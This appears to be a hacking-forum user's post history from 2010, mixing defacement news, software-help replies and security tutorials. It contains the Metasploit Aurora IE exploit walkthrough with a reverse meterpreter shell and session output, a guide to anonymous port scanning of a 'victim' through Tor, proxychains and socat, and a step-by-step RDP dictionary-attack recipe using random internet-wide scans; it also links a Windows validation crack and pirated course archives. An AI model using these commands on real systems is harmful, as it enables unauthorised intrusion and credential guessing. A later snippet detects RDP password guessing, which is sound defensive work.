Everything posted by pyth0n3
-
Friday, January 15, 2010

Update: DEP blocks this sample and the Metasploit module; DEP is enabled by default in IE 8.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

    msf > use exploit/windows/browser/ie_aurora
    msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(ie_aurora) > set LHOST (your IP)
    msf exploit(ie_aurora) > set URIPATH /
    msf exploit(ie_aurora) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on port 4444
    [*] Local IP: http://192.168.0.151:8080/
    [*] Server started.
    msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
    msf exploit(ie_aurora) > sessions -i 1
    [*] Starting interaction with 1...
    meterpreter > getuid
    Server username: WINXP\Developer
    meterpreter > use espia
    Loading extension espia...success.
    meterpreter > screenshot aurora.bmp
    meterpreter > shell
    Process 892 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\Documents and Settings\Developer\Desktop>

metasploit.com
-
11-01-2010

MANILA, Philippines - Hackers struck again, this time, defacing the home page of the Technical Education and Skills Development Authority (TESDA) website, www.tesda.gov.ph.

Hackers put up two pages on the TESDA home page. The first one had a header that read: "Nakikiramay kami sa pagpanaw ng Iskolar ng Bayan, freedom fighter na si Kimay". The first page also contained an illustration of a man giving the middle finger, then the text at the end of the page read: "Ano ba gagamitin sa eleksyon?" The second page posted greetings from Ventureslink and directed visitors to Smartmatic, the Commission on Elections' (Comelec) partner for the automated polls.

This is not the first time government websites have been hacked. The websites of the Department of Health, Department of Social Welfare and Development, Department of Justice, the Philippine National Police's (PNP) Criminal Investigation and Detection Group, and the Information Technology and Electronic Commerce Council were also hacked last month. Malacañang said it is concerned about these incidents of hacking and has instructed the Comelec and other agencies to take steps to secure their websites.

DOH website hacking

On December 17, users visiting the Department of Health (DOH) website found a picture of Health Sec. Francisco Duque III apparently holding genitals towards his mouth. On the upper left corner of the picture, which accompanied a press release about the DOH's firecracker ban campaign, was a drawing of a penis with the words "Use Penis" next to it. The original picture showed Duque blowing on a "torotot" or horn. The DOH encouraged the public to make noise with horns or pans instead of using firecrackers, in order to minimize firecracker-related injuries. Before the DOH website could be fixed, the tampered picture was quickly spread in social networking sites.

The next day, alleged Indonesian hackers broke into the official website of the Department of Social Welfare and Development (DSWD). The DSWD home page displayed a large picture of a green and glowing Grim Reaper bearing the words "Hacker-newbie.org", a Bahasa forum reportedly for hacker communities.

More recently, the National Disaster Coordinating Council's official website was also hacked by "Heart Hacker." Viewers visiting the agency's home page instead saw a black-and-gray message box proclaiming that the site had been hacked.

-- with reports from TJ Manotoc, ABS-CBN News; ANC
-
Surely many of you know Tor and Vidalia and know how to browse the internet anonymously. tor-resolve is a tool that resolves a hostname to an IP address; those who want to do this while staying more discreet will of course use this tool, or any other that lets them do it anonymously. In no case will they send UDP or ICMP packets from their own computer.

An example on Linux:

    tor-resolve www.example.com
    192.168.1.10

I want to describe in a few words how a simple scan can be done anonymously using the Tor network or any other proxy server. You need proxychains (ProxyChains - TCP and DNS through proxy server. HTTP and SOCKS). Proxychains forces any TCP connection made by whatever tool you use to go through the Tor network or any other proxy server. There are some drawbacks here, because proxychains can be used only for TCP; it will not work over UDP.

In this case Nmap can be used as the scanner. You can use it with the -sT option, and -PN if you are sure the host is alive. The -n option ensures that no DNS resolution is done outside the Tor network. -sV is used to find out which service and which version are on each open port. -p is used to specify the ports to scan. Since Tor is very slow, you will have to pick the ports that interest you most.

EX:

    proxychains nmap -sT -PN -n -sV -p 21,23,80,139 192.168.1.10

If you want to send various queries to a web server, you can use netcat together with proxychains, connecting on port 80.

An interesting tool I found is socat, which can be used to relay TCP packets through the Tor SOCKS proxy listening on port 9050. The advantage of this tool is that it can establish a persistent connection with the victim's web server, a kind of tunnel. So we can use Nessus or Wikto to send whatever queries we want to the server we are connected to anonymously.

This command sets up a socat proxy on the local system (127.0.0.1) on port 8080 and makes all TCP packets for the victim 192.168.1.10, port 80, pass through the Tor SOCKS proxy listening on 127.0.0.1 port 9050:

    socat TCP4-LISTEN:8080,fork SOCKS4a:127.0.0.1:192.168.1.10:80,socksport=9050 &

Interested in which Apache version the web server on 192.168.1.10 runs? Connect with netcat to 127.0.0.1 8080.

EX:

    nc 127.0.0.1 8080

Then type "HEAD / HTTP/1.0" and press Enter twice.

Socat will work if you have a static IP or use a dyndns.
-
On RST you will find all the resources you need to find out the password.
-
There is only one, and it is not admin:2
-
OK, because in the Challenges section I posted the password from my Linux system. I am a user who does not know how to set a stronger password, and I was expecting someone to tell me what it is, because I forgot it and can no longer log in. (Can anyone help me, or do I have to format in this case?) I do know, however, that my password can be found in any wordlist, because it is very simple. It is here if anyone feels like helping me: http://rstcenter.com/forum/18676-decode-2-a.rst
-
Do not hesitate to also watch this talk that Johnny Long gave at Defcon17: Johnny Long's talk at DefCon 17 on Vimeo
-
January 7, 2010 Microsoft will issue one bulletin on Patch Tuesday next week that is rated "critical" for Windows 2000. The patch is designed to address a vulnerability that could allow an attacker to take control of a computer by remotely executing code on it, according to an advisory released Thursday. It is rated "low" severity for Windows 7, Vista, XP, Server 2003, and Server 2008 operating systems. Meanwhile, Adobe Systems is scheduled to release a patch for a vulnerability in Adobe Reader and Acrobat on Tuesday that was discovered in mid-December and which is being exploited by attacks in the wild to deliver Trojan horse programs that install backdoor access on computers. Adobe will also be releasing a beta test version of a new automatic updater for Reader and Acrobat on Tuesday, according to ZDNet, sister publication of CNET. The move is welcome, given that Reader was found to be one of the buggiest programs in 2009. news.cnet.com
-
Cum sa devii Lider de Cult - How to become a Cult Leader
pyth0n3 replied to begood's topic in Tutoriale video
It is interesting and worth watching, and I think many people have to deal with this sort of thing. I have had a few experiences with some people who try to use The Art Of Deception, but they know only what they were told to say; it is just that they have 20 or 30 years of experience in the field. They use various religious techniques. It was like looking in a mirror when I watched the video. Many of us have little experience because we are very young and have not managed to learn enough to get past certain things; Social Engineering will always be a person's weakest point. Many people I knew have moved to other religious cults and are no longer the same people I once knew, because they avoid me. Others try to convince me and tell me that the people I spend time with are against me; they tell me that my girlfriend probably does not let me come to them, because I do not go. They make me feel guilty about something: even though, for example, I do not smoke because I know it is harmful, I am guilty of not going to them. They pressure me with certain things, they tell me that before talking to them I belonged to a false religion, and much more. That is why videos like this one can be helpful for many people. Once again, I recommend you go and watch this video.
-
Content:
* About this Course * Audience and Prerequisites
Understanding UNIX: * What is UNIX? * UNIX History * Which UNIX? * UNIX Architecture
Understanding the UNIX Shell: * What is the UNIX Shell? * Which Shell? * Logging In * Basic Commands * Command Syntax * Getting Help * Logging Out
Files and Directories: * Working with Files and Directories * Commands for Files and Directories Tutorials 1 * Commands for Files and Directories 2 * Filenames and File Types * Wildcards 1 * Wildcards 2 * Displaying File Contents * Comparing Files * Copying, Moving and Renaming Files * Deleting Files * Unix Hidden Files * The "." and ".." Directories * Relative vs Absolute Paths * Working with Directories * Finding Files * Archiving Files
Unix Security: * Users and Groups * Security Related Problems * File Protection Overview Tutorials 1 * File Protection Overview 2 * Changing File Permissions * Changing File Ownership * Changing File Group * A Dangerous Security Loophole
Combining Programs - Pipes and Filters: * Introduction to Combining Programs * Standard Output * Standard Input * Standard Input and Output * About Filters * Common Filters * Searching for Text in Files * Standard Error
Process Control: * About Processes 1 * About Processes 2 * Running Commands Asynchronously * Killing Processes * Jobs * More Process Control * Scheduling Commands
vi - A UNIX Text Editor: * Understanding vi * Starting vi * Manipulating Files in vi Tutorials 1 * Manipulating Files in vi 2 * Moving Around 1 * Moving Around 2 * Unix Basic Editing 1 * Basic Editing 2 * Basic Editing 3 * Advanced Editing Tutorials 1 * Advanced Editing 2 * Configuring vi 1 * Configuring vi 2
The UNIX File System: * Introduction to the Unix File System * How Files are Stored * Understanding Links 1 * Understanding Links 2 * Linking Files * Unix Symbolic Links Tutorials 1 * Symbolic Links 2 * UNIX File Types * Mounting 1 * Mounting 2
Communication: * Using telnet in Unix * Using mail
Customising Your Unix Shell Environment: * Changing your Login Shell * Environment Variables 1 * Environment Variables 2 * Your PATH 1 * Your PATH 2 * Your Prompt * Your .profile * Command-line Editing * Korn Shell Command-line Editing * Shell Customisation Options Tutorials 1 * Shell Customisation Options 2 * The End

Download:
http://www.mediafire.com/file/42znmw1km4w/Unix_shellFundamentals.part1.rar
http://www.mediafire.com/file/dzrddkvjwyo/Unix_shellFundamentals.part2.rar
http://www.mediafire.com/file/gzo0imtjjzy/Unix_shellFundamentals.part3.rar
http://www.mediafire.com/file/wmzzlcydjn0/Unix_shellFundamentals.part4.rar
http://www.mediafire.com/file/vlziidmzmml/Unix_shellFundamentals.part5.rar

You will also find it on various other sites. I took it from the url and uploaded it here on mediafire.
-
Download this program and try it; it has a built-in browser and you can convert video to whatever format you want: yds.7z. You can download from various sites, and the best-known video sites are preset in the browser. Pass: insecure
-
Info: Professor Messer’s Nmap Secrets Training Course | Professor Messer

Content:
Module 01 - Getting Started with Nmap
Module 02 - Nmap Basics
Module 03 - Scans for Every Occasion
Module 04 - Back Pocket Scans
Module 05 - Useful Scanning Options
Module 06 - Nmap Pings - The Search for Hosts
Module 07 - Recon Scanning
Module 08 - Ninja Scanning
Module 09 - Output Options
Module 10 - Windows and Nmap
Module 11 - Real-World Nmap Scanning
+ Bonus Content

All in 552,5 MB video .flv format (structured in htm menu page format)

Download rapidshare
http://rapidshare.com/files/255612391/NMap_Secrets_Training.part1.rar
http://rapidshare.com/files/255612045/NMap_Secrets_Training.part2.rar
http://rapidshare.com/files/255612558/NMap_Secrets_Training.part3.rar
http://rapidshare.com/files/255612147/NMap_Secrets_Training.part4.rar
http://rapidshare.com/files/255612400/NMap_Secrets_Training.part5.rar
http://rapidshare.com/files/255612030/NMap_Secrets_Training.part6.rar

Download filefactory
http://www.filefactory.com/file/ahde9af/n/NMap_Secrets_Training_part1_ra...
http://www.filefactory.com/file/ahde9ae/n/NMap_Secrets_Training_part2_ra...
http://www.filefactory.com/file/ahde9ac/n/NMap_Secrets_Training_part3_ra...
http://www.filefactory.com/file/ahde9ag/n/NMap_Secrets_Training_part4_ra...
http://www.filefactory.com/file/ahde9ah/n/NMap_Secrets_Training_part5_ra...
http://www.filefactory.com/file/ahde9ab/n/NMap_Secrets_Training_part6_ra...
-
While browsing the internet I found this link, which has a few interesting videos, and thought I would post it: The Very Angry Toad
-
Content:
SQL Injection
What is SQL Injection
Exploiting Web Applications
SQL Injection Steps
What Should You Look For
What If It Doesn't Take Input
OLE DB Errors
SQL Injection Techniques
How to Test for SQL Injection Vulnerability
How Does it Work
BadLogin.aspx.cs
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
SQL Injection in Oracle
SQL Injection in MySql Database
Attack Against SQL Servers
SQL Server Resolution Service (SSRS)
Osql L-Probing
SQL Injection Tools
SQL Injection Automated Tools
Blind SQL Injection
Blind SQL Injection: Countermeasures
SQL Injection Countermeasures
Preventing SQL Injection Attacks

Download:
http://rapidshare.com/files/331771208/sql_injection.7z.001
http://rapidshare.com/files/331778791/sql_injection.7z.002
http://rapidshare.com/files/331785290/sql_injection.7z.003
http://rapidshare.com/files/331791850/sql_injection.7z.004
http://rapidshare.com/files/331793214/sql_injection.7z.005

Pass: ins3cur3
-
Published: Thursday January 7, 2010

PETALING JAYA: The Malaysian Judiciary’s website was discovered hacked and defaced on Thursday night and its homepage substituted with a threat to not pursue the issue of the Catholic weekly the Herald’s use of the word “Allah.”

The hacker, using the handle “Brainwash,” defaced the site with a bright-red headline saying “TakeDown by Brainwash!” and what can only be described as “creative” use of the English language. Blazed across the page in huge letters was “Mess with the best, die like the rest.” The hacker also wrote: “Allah only restricted to Muslim only. Dont touch us as we dont touch you. Unless ....”

http://thestar.com.my/archives/2010/1/7/nation/hacked.jpg

It was followed by a threatening postscript at the bottom of the page “To the court, Brain know you postponed it but if you wise enough then you should drop it.” The hacker also posted a picture of a woman, bent over suggestively, apparently “washing” a brain.

Bar Council committee member Edmund Bon has labelled the act as “unwarranted and unacceptable.” He said hacking and defacing websites was a criminal offence under the Computer Crimes Act 1997. “The comments appear to put undue pressure on the judiciary to decide the case in a certain way and this should not be tolerated in a civil society.

“The Bar Council is all for allowing discussions and criticisms over court decisions so long as they are done in a civil manner. This threat intends to put pressure on the judiciary and it has overstepped the freedom of discussion boundaries,” he said when contacted.

The Herald website has also been hacked three times after the decision by High Court Justice Lau Bee Lan on allowing the word “Allah” to be used in the publication’s Malay-language edition. Her decision has sparked anger and ire from various Muslim groups. Some groups have even threatened to stage gatherings on Friday to protest against the ruling. The Home Ministry has appealed the decision and has been granted a stay of execution on Justice Lau’s ruling.

De facto law minister Datuk Seri Nazri Abdul Aziz could not be reached for comment as at press time.

By YENG AI CHUN
THESTAR.COM
-
Download: Genuine.Advantage.Validation.v1.8.31.0..rar
-
It is the only default browser on Linux; I need an emulator for Explorer.
-
I will describe a short guide on how to find a Terminal Server service and carry out a dictionary attack from a Linux system. There are several methods; here I will describe only one. As the tool I will use rdesktop 1.4.1 for Linux, to which a patch must be added in order to perform the dictionary attack. You can find rdesktop 1.4.1 on the internet, but here is a link where you can get it with the patch file included: rdesktop-1.4.1.tar

The first thing you need to do is find a terminal server, which by default is on TCP port 3389. You can use the following Nmap command, or whatever scanner you use.

    nmap -oN TerminalServer.txt -p 3389 --open 192.168.0.0/24

where instead of 192.168.0.0/24 you specify the IPs you want to scan. Nmap will save everything to a file, TerminalServer.txt.

Another command is:

    nmap -PS3389 -iR 0 -p 3389 --open -oN TerminalServer.txt

Instead of 0, put how many IPs you want it to scan (by default 0 will scan indefinitely). In this case too, Nmap saves everything in TerminalServer.txt. The --open option is there to show only open services.

Once you have enough targets, you move on to phase 2: the dictionary attack.

Download rdesktop-1.4.1.tar. You will need to extract the archive with the command

    tar -xf rdesktop-1.4.1.tar

Then go to where you unpacked the archive,

    cd rdesktop-1.4.1

and run the following command to apply the patch

    patch -p1 -i rdp-brute-force-r422.diff

Now you need to compile:

    ./configure
    make
    make install

When you are done, run the rdesktop command and it will show you all the options.

Ex:

    rdesktop -u administrator -p pass.txt 192.168.1.1

where pass.txt is the word dictionary.

An administrator will configure things so that some will allow only a few attempts and close the rest. This is illegal; you should be authorized before scanning any network. Everything can be saved in a log file.

I wrote this guide for informational purposes; only by knowing what the enemy does can measures be taken.
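For the defending side of the procedure above, an added example (not part of the original post): a run of failed Terminal Server logons from one source inside a short window is what a dictionary attack looks like in the logs, and a success right after it deserves attention. The CSV layout, the sample lines, and the use of Windows Security event IDs 4625/4624 with logon type 10 are assumptions of this example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export: time, event ID, logon type, source IP, account.
# The comma-separated layout is an assumption, not a native Windows format.
SAMPLE_LOG = """\
2010-01-20T10:00:00,4625,10,203.0.113.7,administrator
2010-01-20T10:00:04,4625,10,203.0.113.7,administrator
2010-01-20T10:00:09,4625,10,203.0.113.7,administrator
2010-01-20T10:00:13,4625,10,203.0.113.7,administrator
2010-01-20T10:00:18,4625,10,203.0.113.7,administrator
2010-01-20T10:00:22,4624,10,203.0.113.7,administrator
2010-01-20T10:05:00,4625,10,198.51.100.20,jsmith
2010-01-20T10:30:00,4625,10,198.51.100.20,jsmith
2010-01-20T10:30:40,4624,10,198.51.100.20,jsmith
this line is truncated,4625
2010-01-20T11:00:00,4625,2,192.0.2.5,console-user
"""

FAILED, SUCCESS = "4625", "4624"   # Windows Security log: failed / successful logon
RDP_LOGON_TYPES = {"10"}           # RemoteInteractive; hosts using NLA may log type 3


def parse(line):
    """Return (time, event_id, logon_type, source, account) or None if malformed."""
    parts = [p.strip() for p in line.split(",")]
    if len(parts) != 5:
        return None
    try:
        when = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
    except ValueError:
        return None
    return (when, *parts[1:])


def detect_rdp_guessing(text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with `threshold` failed RDP logons inside `window`.
    Input must be in time order; success_after marks a logon after the burst."""
    recent = defaultdict(deque)   # source -> times of recent failures
    alerts = {}
    for record in filter(None, map(parse, text.splitlines())):
        when, event_id, logon_type, source, account = record
        if logon_type not in RDP_LOGON_TYPES:
            continue
        if event_id == FAILED:
            times = recent[source]
            times.append(when)
            while when - times[0] > window:   # drop failures outside the window
                times.popleft()
            if len(times) >= threshold:
                alert = alerts.setdefault(
                    source, {"accounts": set(), "first_alert": when,
                             "success_after": False})
                alert["accounts"].add(account)
        elif event_id == SUCCESS and source in alerts:
            alerts[source]["success_after"] = True   # a guess may have worked
    return alerts


if __name__ == "__main__":
    for src, info in detect_rdp_guessing(SAMPLE_LOG).items():
        print(src, sorted(info["accounts"]), info["first_alert"], info["success_after"])
```

The user who mistypes twice half an hour apart (198.51.100.20 in the sample) stays below the threshold, which is the same trade-off an account lockout policy makes.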
-
I posted this because I had seen many people who were not able to build various queries to search with Google; in any case, it explains to beginners how to search with Google, and I think many do not know how.
-
DefCon 15 - T112 - No-Tech Hacking DefCon 15, Las Vegas 2007 No-Tech Hacking Johnny Long
-
Google Guide is an online interactive tutorial and reference for experienced users, novices, and everyone in between. I developed Google Guide because I wanted more information about Google's capabilities, features, and services than I found on Google's website. --Nancy Blachman
Interactive online Google tutorial and references - Google Guide
-
The password is correct; make sure you do not have CAPS LOCK on, or that you are not typing it in a hurry, and various other reasons....
-
Here you can download Wikto, a tool that uses GHDB to scan various sites. To use it you will also need to download a proxy called SPUD from the same page, further down. For documentation go to this url: http://www.sensepost.com/research/wikto/using_wikto.pdf
You will need to register to be able to download; it is free.
Download: http://www.sensepost.com/research/wikto/
-
I am of Russian origin but was born in Romania. I live in Torino. I have not been to Romania for 7 years.
-
Look here: Application failed to initialize (0x0000135) - Powered By Kayako eSupport. It says you need to install NET Framework.

By the way, uninstalling software is also a process that must be done carefully. There are many uninstaller programs much better than the default one in Windows, which is not able to remove programs completely. One that is free and very well known is revo, http://www.revouninstaller.com, which also has a scanner to check whether anything is left of the program you want to uninstall. Try it and see the difference, and how many registry keys are left on your computer without you realizing it.